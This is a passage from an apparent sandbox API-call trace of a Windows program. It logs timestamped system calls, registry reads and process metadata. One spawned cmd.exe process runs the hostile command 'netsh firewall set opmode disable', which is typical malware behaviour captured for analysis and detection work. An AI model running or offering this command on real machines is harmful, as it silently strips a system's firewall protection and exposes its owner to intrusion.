wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.756] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.756] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.756] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.756] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.756] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.756] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.756] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.756] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.756] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.756] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.756] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.756] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.756] VirtualFree (lpAddress=0x1d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.756] VirtualFree (lpAddress=0x23a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.761] FreeLibrary (hLibModule=0x772d0000) returned 1 [0132.761] LocalFree (hMem=0xa18120) returned 0x0 [0132.761] FreeLibrary (hLibModule=0x772d0000) returned 1 [0132.761] LocalFree (hMem=0xa18198) returned 0x0 [0132.761] ExitProcess (uExitCode=0x0) Thread: id = 33 os_tid = 0x124c Thread: id = 34 os_tid = 0x120c Thread: id = 35 os_tid = 0x1208 Thread: id = 36 os_tid = 0x1210 Thread: id = 37 os_tid = 0x12b4 Thread: id = 74 os_tid = 0xf98 Process: id = "4" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1b375000" os_pid = "0x1384" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1344" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 28 os_tid = 0x1330 Thread: id = 29 os_tid = 0x1350 Thread: id = 30 os_tid = 0x1354 Thread: id = 31 os_tid = 0x1370 Thread: id = 32 os_tid = 0x13d0 Process: id = "5" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x241b3000" os_pid = "0xff0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1344" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C netsh firewall set opmode disable" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 38 os_tid = 0x764 [0103.152] GetModuleHandleA (lpModuleName=0x0) returned 0xf90000 [0103.152] __set_app_type (_Type=0x1) [0103.152] __p__fmode () returned 0x776f3c14 [0103.152] __p__commode () returned 0x776f49ec [0103.152] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xfa6fd0) returned 0x0 [0103.152] __getmainargs (in: _Argc=0xfbd1a4, _Argv=0xfbd1a8, _Env=0xfbd1ac, _DoWildCard=0, _StartInfo=0xfbd1b8 | out: _Argc=0xfbd1a4, _Argv=0xfbd1a8, _Env=0xfbd1ac) returned 0 [0103.152] _onexit (_Func=0xfa8030) returned 0xfa8030 [0103.152] _onexit (_Func=0xfa8040) returned 0xfa8040 [0103.152] _onexit (_Func=0xfa8050) returned 0xfa8050 [0103.153] _onexit (_Func=0xfa8060) returned 0xfa8060 [0103.153] _onexit (_Func=0xfa8070) returned 0xfa8070 [0103.153] _onexit (_Func=0xfa8080) returned 0xfa8080 [0103.153] GetCurrentThreadId () returned 0x764 [0103.153] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x764) returned 0xbc [0103.153] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x772d0000 [0103.153] GetProcAddress (hModule=0x772d0000, lpProcName="SetThreadUILanguage") returned 0x772e4f70 [0103.154] SetThreadUILanguage (LangId=0x0) returned 0x760409 [0103.331] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0103.331] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x8ff7f4 | out: phkResult=0x8ff7f4*=0x0) returned 0x2 [0103.331] VirtualQuery (in: lpAddress=0x8ff7ff, lpBuffer=0x8ff7ac, dwLength=0x1c | out: lpBuffer=0x8ff7ac*(BaseAddress=0x8ff000, AllocationBase=0x800000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0103.331] VirtualQuery (in: lpAddress=0x800000, lpBuffer=0x8ff7ac, dwLength=0x1c | out: lpBuffer=0x8ff7ac*(BaseAddress=0x800000, AllocationBase=0x800000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0103.331] VirtualQuery (in: lpAddress=0x801000, lpBuffer=0x8ff7ac, dwLength=0x1c | out: lpBuffer=0x8ff7ac*(BaseAddress=0x801000, AllocationBase=0x800000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0103.331] VirtualQuery (in: lpAddress=0x803000, lpBuffer=0x8ff7ac, dwLength=0x1c | out: lpBuffer=0x8ff7ac*(BaseAddress=0x803000, AllocationBase=0x800000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0103.331] VirtualQuery (in: lpAddress=0x900000, lpBuffer=0x8ff7ac, dwLength=0x1c | out: lpBuffer=0x8ff7ac*(BaseAddress=0x900000, AllocationBase=0x900000, AllocationProtect=0x2, RegionSize=0xc5000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0103.331] GetConsoleOutputCP () returned 0x1b5 [0103.572] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xfc3850 | out: lpCPInfo=0xfc3850) returned 1 [0103.572] SetConsoleCtrlHandler (HandlerRoutine=0xfb7260, Add=1) returned 1 [0103.572] _get_osfhandle (_FileHandle=1) returned 0x90 [0103.572] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xfc388c | out: lpMode=0xfc388c) returned 1 [0103.830] _get_osfhandle (_FileHandle=0) returned 0x8c [0103.830] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xfc3888 | out: lpMode=0xfc3888) returned 1 [0104.007] _get_osfhandle (_FileHandle=1) returned 0x90 [0104.008] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x0) returned 1 [0104.205] _get_osfhandle (_FileHandle=1) returned 0x90 [0104.205] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xfc3890 | out: lpMode=0xfc3890) returned 1 [0104.383] _get_osfhandle (_FileHandle=1) returned 0x90 [0104.383] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0104.589] _get_osfhandle (_FileHandle=0) returned 0x8c [0104.589] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xfc3894 | out: lpMode=0xfc3894) returned 1 [0104.782] _get_osfhandle (_FileHandle=0) returned 0x8c [0104.782] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0104.987] GetEnvironmentStringsW () returned 0xbf4bb8* [0104.987] GetProcessHeap () returned 0xbf0000 [0104.987] RtlAllocateHeap (HeapHandle=0xbf0000, Flags=0x8, Size=0xaca) returned 0xbf5690 [0104.987] FreeEnvironmentStringsA (penv="A") returned 1 [0104.987] GetProcessHeap () returned 0xbf0000 [0104.987] RtlAllocateHeap (HeapHandle=0xbf0000, Flags=0x8, Size=0x4) returned 0xbf4698 [0104.987] GetEnvironmentStringsW () returned 0xbf4bb8* [0104.987] GetProcessHeap () returned 0xbf0000 [0104.987] RtlAllocateHeap (HeapHandle=0xbf0000, Flags=0x8, Size=0xaca) returned 0xbf6168 [0104.987] FreeEnvironmentStringsA (penv="A") returned 1 [0104.987] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x8fe750 | out: phkResult=0x8fe750*=0xcc) returned 0x0 [0104.988] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x8fe758, lpData=0x8fe75c, lpcbData=0x8fe754*=0x1000 | out: lpType=0x8fe758*=0x0, lpData=0x8fe75c*=0x0, lpcbData=0x8fe754*=0x1000) returned 0x2 [0104.988] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x8fe758, lpData=0x8fe75c, lpcbData=0x8fe754*=0x1000 | out: lpType=0x8fe758*=0x4, lpData=0x8fe75c*=0x1, lpcbData=0x8fe754*=0x4) returned 0x0 [0104.988] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x8fe758, lpData=0x8fe75c, lpcbData=0x8fe754*=0x1000 | out: lpType=0x8fe758*=0x0, lpData=0x8fe75c*=0x1, lpcbData=0x8fe754*=0x1000) returned 0x2 [0104.988] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x8fe758, lpData=0x8fe75c, lpcbData=0x8fe754*=0x1000 | out: lpType=0x8fe758*=0x4, lpData=0x8fe75c*=0x0, lpcbData=0x8fe754*=0x4) returned 0x0 [0104.988] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x8fe758, lpData=0x8fe75c, lpcbData=0x8fe754*=0x1000 | out: lpType=0x8fe758*=0x4, lpData=0x8fe75c*=0x40, lpcbData=0x8fe754*=0x4) returned 0x0 [0104.988] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x8fe758, lpData=0x8fe75c, lpcbData=0x8fe754*=0x1000 | out: lpType=0x8fe758*=0x4, lpData=0x8fe75c*=0x40, lpcbData=0x8fe754*=0x4) returned 0x0 [0104.988] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0x8fe758, lpData=0x8fe75c, lpcbData=0x8fe754*=0x1000 | out: lpType=0x8fe758*=0x0, lpData=0x8fe75c*=0x40, lpcbData=0x8fe754*=0x1000) returned 0x2 [0104.988] RegCloseKey (hKey=0xcc) returned 0x0 [0104.988] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x8fe750 | out: phkResult=0x8fe750*=0xcc) returned 0x0 [0104.988] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x8fe758, lpData=0x8fe75c, lpcbData=0x8fe754*=0x1000 | out: lpType=0x8fe758*=0x0, lpData=0x8fe75c*=0x40, lpcbData=0x8fe754*=0x1000) returned 0x2 [0104.988] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x8fe758, lpData=0x8fe75c, lpcbData=0x8fe754*=0x1000 | out: lpType=0x8fe758*=0x4, lpData=0x8fe75c*=0x1, lpcbData=0x8fe754*=0x4) returned 0x0 [0104.988] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x8fe758, lpData=0x8fe75c, lpcbData=0x8fe754*=0x1000 | out: lpType=0x8fe758*=0x0, lpData=0x8fe75c*=0x1, lpcbData=0x8fe754*=0x1000) returned 0x2 [0104.988] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x8fe758, lpData=0x8fe75c, lpcbData=0x8fe754*=0x1000 | out: lpType=0x8fe758*=0x4, lpData=0x8fe75c*=0x0, lpcbData=0x8fe754*=0x4) returned 0x0 [0104.988] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x8fe758, lpData=0x8fe75c, lpcbData=0x8fe754*=0x1000 | out: lpType=0x8fe758*=0x4, lpData=0x8fe75c*=0x9, lpcbData=0x8fe754*=0x4) returned 0x0 [0104.988] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x8fe758, lpData=0x8fe75c, lpcbData=0x8fe754*=0x1000 | out: lpType=0x8fe758*=0x4, lpData=0x8fe75c*=0x9, lpcbData=0x8fe754*=0x4) returned 0x0 [0104.988] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0x8fe758, lpData=0x8fe75c, lpcbData=0x8fe754*=0x1000 | out: lpType=0x8fe758*=0x0, lpData=0x8fe75c*=0x9, lpcbData=0x8fe754*=0x1000) returned 0x2 [0104.988] RegCloseKey (hKey=0xcc) returned 0x0 [0104.988] time (in: timer=0x0 | out: timer=0x0) returned 0x5e6f3b9e [0104.988] srand (_Seed=0x5e6f3b9e) [0104.988] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C netsh firewall set opmode disable" [0104.989] malloc (_Size=0x4000) returned 0xed21f0 [0104.989] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C netsh firewall set opmode disable" [0104.989] malloc (_Size=0xffce) returned 0xcf0048 [0104.990] ??_V@YAXPAX@Z () returned 0x8ff734 [0104.990] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0xcf0048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0104.990] malloc (_Size=0xffce) returned 0xd00020 [0104.991] ??_V@YAXPAX@Z () returned 0x8ff508 [0104.991] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xd00020, nSize=0x7fe7 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0104.991] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xfbf840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0104.991] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xfbf840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0104.991] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xfbf840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0104.992] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0104.992] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0104.992] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0104.992] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0104.992] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0104.992] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0104.992] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0104.992] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0104.992] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0104.992] GetProcessHeap () returned 0xbf0000 [0104.992] RtlFreeHeap (HeapHandle=0xbf0000, Flags=0x0, BaseAddress=0xbf5690) returned 1 [0104.992] GetEnvironmentStringsW () returned 0xbf4bb8* [0104.992] GetProcessHeap () returned 0xbf0000 [0104.992] RtlAllocateHeap (HeapHandle=0xbf0000, Flags=0x8, Size=0xae2) returned 0xbf7730 [0104.992] FreeEnvironmentStringsA (penv="A") returned 1 [0104.992] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xfbf840, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0104.992] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xfbf840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0104.992] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0104.992] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0104.992] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0104.993] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0104.993] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0104.993] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0104.993] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0104.993] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0104.993] malloc (_Size=0xffce) returned 0xd0fff8 [0104.993] ??_V@YAXPAX@Z () returned 0x8ff2a0 [0104.993] GetProcessHeap () returned 0xbf0000 [0104.993] RtlAllocateHeap (HeapHandle=0xbf0000, Flags=0x8, Size=0x38) returned 0xbf0ae0 [0104.993] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0xd0fff8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0104.994] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x7fe7, lpBuffer=0xd0fff8, lpFilePart=0x8ff2ec | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x8ff2ec*="Desktop") returned 0x17 [0104.994] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0104.994] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x8ff070 | out: lpFindFileData=0x8ff070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0xbf0b20 [0104.994] FindClose (in: hFindFile=0xbf0b20 | out: hFindFile=0xbf0b20) returned 1 [0104.994] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0x8ff070 | out: lpFindFileData=0x8ff070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0xbf0b20 [0104.995] FindClose (in: hFindFile=0xbf0b20 | out: hFindFile=0xbf0b20) returned 1 [0104.995] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0x8ff070 | out: lpFindFileData=0x8ff070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x6d07dee7, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x6d07dee7, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0xbf0b20 [0104.995] FindClose (in: hFindFile=0xbf0b20 | out: hFindFile=0xbf0b20) returned 1 [0104.995] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0104.995] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0104.995] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0104.995] GetProcessHeap () returned 0xbf0000 [0104.995] RtlFreeHeap (HeapHandle=0xbf0000, Flags=0x0, BaseAddress=0xbf7730) returned 1 [0104.995] GetEnvironmentStringsW () returned 0xbf4bb8* [0104.995] GetProcessHeap () returned 0xbf0000 [0104.995] RtlAllocateHeap (HeapHandle=0xbf0000, Flags=0x8, Size=0xb1a) returned 0xbf6c40 [0104.995] FreeEnvironmentStringsA (penv="=") returned 1 [0104.995] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0xcf0048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0104.995] GetProcessHeap () returned 0xbf0000 [0104.995] RtlFreeHeap (HeapHandle=0xbf0000, Flags=0x0, BaseAddress=0xbf0ae0) returned 1 [0104.995] ??_V@YAXPAX@Z () returned 0x1 [0104.995] ??_V@YAXPAX@Z () returned 0x1 [0104.995] GetProcessHeap () returned 0xbf0000 [0104.995] RtlAllocateHeap (HeapHandle=0xbf0000, Flags=0x8, Size=0x400e) returned 0xbf8d48 [0104.996] GetProcessHeap () returned 0xbf0000 [0104.996] RtlAllocateHeap (HeapHandle=0xbf0000, Flags=0x8, Size=0x50) returned 0xbf7768 [0104.996] GetProcessHeap () returned 0xbf0000 [0104.996] RtlFreeHeap (HeapHandle=0xbf0000, Flags=0x0, BaseAddress=0xbf8d48) returned 1 [0104.996] GetConsoleOutputCP () returned 0x1b5 [0105.142] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xfc3850 | out: lpCPInfo=0xfc3850) returned 1 [0105.142] GetUserDefaultLCID () returned 0x409 [0105.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xfbf82c, cchData=8 | out: lpLCData=":") returned 2 [0105.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x8ff65c, cchData=128 | out: lpLCData="0") returned 2 [0105.142] GetLocaleInfoW (in: 